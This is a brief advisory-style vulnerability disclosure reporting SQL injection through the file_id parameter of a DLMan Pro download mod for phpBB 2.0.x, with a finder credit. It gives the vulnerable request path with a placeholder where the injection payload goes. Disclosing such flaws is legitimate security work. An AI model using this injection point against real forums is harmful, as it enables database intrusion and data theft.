SQL Injection was found in the Variable $file_id in : DLMan Pro' Mod
vulnerable system :
phpBB 2.0.x 
exploit :
dlman.php?func=file_info&file_id='[SQL Injection]


Bug Found by : LovER BOY

SecurityGurus Team
www.securitygurus[d0t]Net